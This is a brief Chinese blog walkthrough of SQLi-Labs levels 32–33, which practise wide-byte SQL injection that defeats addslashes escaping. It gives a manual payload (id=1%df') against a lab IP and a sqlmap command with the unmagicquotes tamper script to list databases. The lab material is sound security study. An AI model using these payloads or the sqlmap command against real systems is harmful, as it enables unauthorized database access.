sqlilabs第三十二三十三关

发布时间:2023年12月25日

Less-32(GET - Bypass custom filter adding slashes to dangerous chars)

手工注入

由 宽字符注入可知payload

成功触发报错

http://192.168.21.149/Less-32/
?id=1%df'

要写字符串的话直接吧字符串变成ascii码

注意16进制的表示方式

自动注入
sqlmap -u http://192.168.21.149/Less-32/?id=1 --tamper /usr/share/sqlmap/tamper/unmagicquotes.py --dbs --batch

sqlmap宽字节绕过只需要加入脚本

Less-33(GET - Bypass AddSlashes())

手工注入

和上一关一样

自动注入

和上一关一样

文章来源:https://blog.csdn.net/m0_73248913/article/details/135184383
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。